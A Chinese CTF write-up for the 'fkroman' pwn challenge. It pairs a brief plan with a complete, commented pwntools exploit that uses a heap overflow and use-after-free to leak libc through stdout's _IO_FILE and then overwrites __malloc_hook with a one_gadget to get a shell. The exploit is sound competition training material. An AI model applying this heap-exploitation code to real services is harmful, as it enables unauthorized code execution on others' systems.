数字经济 pwn fkroman writeup

参考文章:https://mp.weixin.qq.com/s/Q4A6LwCd2E29uSXjMJs1dg
https://firmianay.gitbooks.io/ctf-all-in-one/doc/4.13_io_file.html
本地环境:ubuntu 16.04
thought:
1、利用堆溢出伪造堆块,并用uaf漏洞打_IO_FILE泄露出libc地址
2、再用uaf漏洞劫持malloc_hook为one_gadget

exp如下,成功率不高(约 1/16):伪造的 fastbin fd 只用 p16 覆盖低 2 字节,其中页内偏移以上的 4 位受 ASLR 随机化、只能靠猜,因此 main 中用循环最多重试 100 次。

#!/usr/bin/env python2

from pwn import *
# Global pwntools configuration: verbose tube logging, x86-64 Linux target.
context(log_level='debug', arch='amd64', os='linux')

# Challenge binary and the libc it ships with; every hard-coded offset in this
# script is only valid for this exact libc-2.23 build.
exe, lib = './fkroman', './libc-2.23.so'
# Remote instance of the challenge (used when LOCAL is 0).
ip, port = '121.40.246.48', 9999
elf, libc = ELF(exe), ELF(lib)


def dbg(script=''):
    """Attach gdb to the global tube `io`, running `script` as the gdb script."""
    gdbscript = script
    attach(io, gdbscript=gdbscript)

def choice(idx):
    """Answer the 'Your choice: ' menu prompt on `io` with option `idx`."""
    answer = str(idx)
    io.sendlineafter('Your choice: ', answer)

def index(idx):
    """Answer the 'Index: ' prompt on `io` with chunk slot `idx`."""
    slot = str(idx)
    io.sendlineafter('Index: ', slot)

def add(idx, size):
    """Menu option 1: allocate a chunk of `size` bytes into slot `idx`."""
    choice(1)
    index(idx)
    size_str = str(size)
    io.sendlineafter('Size: ', size_str)

def dele(idx):
    """Menu option 3: free slot `idx`.

    The slot stays editable after the free (edit() on a freed index is the
    UAF that exp() relies on).
    """
    choice(3)
    index(idx)

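def edit(idx, size, content):
    """Menu option 4: write `content` (exactly `size` bytes) into slot `idx`.

    The target is told `size` and the payload is then pushed with
    sendafter(), so a payload whose length differs from `size` may leave the
    target waiting for more input or desynchronise the next prompt — a
    failure that is invisible inside the retry loop in __main__.  Reject the
    mismatch up front instead.

    Raises:
        ValueError: if len(content) != size.
    """
    if len(content) != size:
        raise ValueError('edit(%d): payload is %d bytes but size is %d'
                         % (idx, len(content), size))
    choice(4)
    index(idx)
    io.sendlineafter('Size: ', str(size))
    io.sendafter('Content: ', content)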

# ------------------------------------------------
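LOCAL = 1  # 1: spawn ./fkroman locally, 0: connect to ip:port
# Low 16 bits of the fake fastbin target in libc (the original notes it as
# _IO_2_1_stderr_+157; for the stock 16.04 libc-2.23 that is the usual
# _IO_2_1_stdout_-0x43 fake chunk — verify in gdb).  Only the low 12 bits
# (page offset) are fixed; bits 12-15 are an ASLR guess, so a run succeeds
# roughly 1 in 16 times.  Only index 0 is used by exp().
iofile_off = [0x25dd, 0xf5eb]
# Distance from the qword leaked out of stdout to the libc base, measured in
# one gdb session (libc mapped at 0x7ffff7a0d000, leaked value
# 0x7ffff7dd2600).  Valid only for this libc-2.23 build.
libc_off = 0x3c5600  # == 0x7ffff7dd2600 - 0x7ffff7a0d000
# one_gadget candidates for this libc-2.23 build; exp() uses index 1.
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]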
# ------------------------------------------------


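def exp():
    """Drive the two-stage exploit over the global tube `io`.

    Stage 1 (leak libc): three chunks are freed; the UAF edit on the freed
    chunks plus a heap overflow that forges a 0x71 size field make the 0x70
    fastbin hand out a chunk overlapping the stdout _IO_FILE.  Rewriting its
    flags and the low byte of _IO_write_base makes the next output flush
    dump libc pointers, and libc.address is derived from one of them via
    libc_off.
    Stage 2 (malloc_hook): the same fastbin dup yields a chunk at
    __malloc_hook-0x23, a one_gadget is written over __malloc_hook and one
    more add() fires it.

    Only the low 16 bits of the fake fastbin pointer are written (p16) and
    4 of those bits are randomised by ASLR, so stage 1 fails most of the
    time.  Any pwntools error (EOFError, timeout, short leak) propagates to
    the caller, which treats it as a failed attempt and retries.

    gdb.attach()/pause() hooks are kept commented out: the caller runs this
    up to 100 times unattended, and attaching gdb to a remote() tube does
    not work anyway.
    """
    add(0, 0x70-8)
    add(1, 0x70-8)
    add(2, 0x90-8)
    add(3, 0x20-8)
    # ------------------- leak libc ---------------------
    dele(1)
    dele(0)
    dele(2)
    # UAF: chunk 0 is free but still editable; redirect its fastbin fd to
    # chunk 2 by changing only the low byte (no heap address needed).
    edit(0, 1, p8(0xe0))
    # Overflow out of chunk 1 into the following header so chunk 2 carries
    # a 0x71 size and passes the fastbin size check when handed out.
    edit(1, 0x70, 'A'*0x68+p64(0x71))
    # Partial overwrite of chunk 2's fd with the low 16 bits of the
    # _IO_FILE target; bits 12-15 are the ASLR guess (see iofile_off).
    edit(2, 2, p16(iofile_off[0]))
    #gdb.attach(io)
    add(4, 0x70-8)  # chunk 0
    add(5, 0x70-8)  # chunk 2
    add(6, 0x70-8)  # forged chunk over the _IO_FILE target
    # Layout assumes the chunk's user data starts 0x33 bytes before the
    # _IO_FILE: 3+0x30 bytes of filler, then flags =
    # _IO_MAGIC|_IO_IS_APPENDING|_IO_CURRENTLY_PUTTING, the three read
    # pointers zeroed, and the low byte of _IO_write_base zeroed so the next
    # flush writes out memory preceding the buffer (libc pointers).
    edit(6, 0x54, 'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+"\x00")
    # recvn() rather than recv(): on a remote tube recv() may return short,
    # which would shift the leaked qword and silently corrupt libc.address.
    # The timeout turns a stalled target into '' -> u64() error -> retry,
    # instead of blocking the retry loop forever.
    io.recvn(0x40, timeout=5)
    recv_addr = u64(io.recvn(8, timeout=5))
    log.info('libc->'+hex(recv_addr))
    libc.address = recv_addr - libc_off
    log.info(hex(libc.address))

    # ------------------- malloc_hook -------------------
    add(7, 0x70-8)  # chunk 2 again
    # Plant a sane 0x21 size 0x70 bytes in (still inside the former 0x90
    # chunk), presumably so free() accepts chunk 7 back into the 0x70
    # fastbin.
    edit(7, 0x70, 'B'*0x68+p64(0x21))
    dele(7)
    info(hex(libc.sym['__malloc_hook']-0x23))
    # Second fastbin dup: fd -> __malloc_hook-0x23, where (per the original
    # run, _IO_wide_data_0+301) the 0x7f byte of a neighbouring libc pointer
    # presumably serves as the fake 0x70-class size field.
    edit(7, 8, p64(libc.sym['__malloc_hook']-0x23))
    #gdb.attach(io)
    add(8, 0x70-8)  # chunk 7
    add(9, 0x70-8)  # chunk at __malloc_hook-0x23
    info(hex(libc.address+onegadgets[1]))
    # 0x13 bytes of padding reach __malloc_hook; overwrite it with the gadget.
    edit(9, 0x1b, 'C'*0x13+p64(libc.address+onegadgets[1]))
    # Any allocation now goes through __malloc_hook -> one_gadget.
    add(10, 0)
    io.interactive()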


# ------------------------------------------------
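if __name__ == '__main__':

    # Stage 1 of exp() guesses 4 ASLR bits, so retry with a fresh
    # process/connection up to 100 times.  The loop deliberately continues
    # after exp() returns (i.e. after the interactive session ends) so a
    # dead shell can be abandoned with Ctrl-D and the next attempt starts.
    for i in range(100):
        io = None
        try:
            if LOCAL:
                # Run the binary against the shipped libc so the hard-coded
                # 2.23 offsets apply locally (the original built this env but
                # never passed it to process()).  Assumes the system ld.so is
                # compatible with ./libc-2.23.so — confirm on your box.
                io = elf.process(env={"LD_PRELOAD": libc.path})
            else:
                io = remote(ip, port)
            exp()
        except Exception as e:
            # A wrong ASLR guess surfaces as EOFError / timeout / short leak.
            # `except Exception` (not bare `except:`) lets Ctrl-C abort the
            # loop instead of being swallowed 100 times.
            print i, repr(e)
        finally:
            # Do not leave up to 100 dead processes/sockets behind.
            if io is not None:
                io.close()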
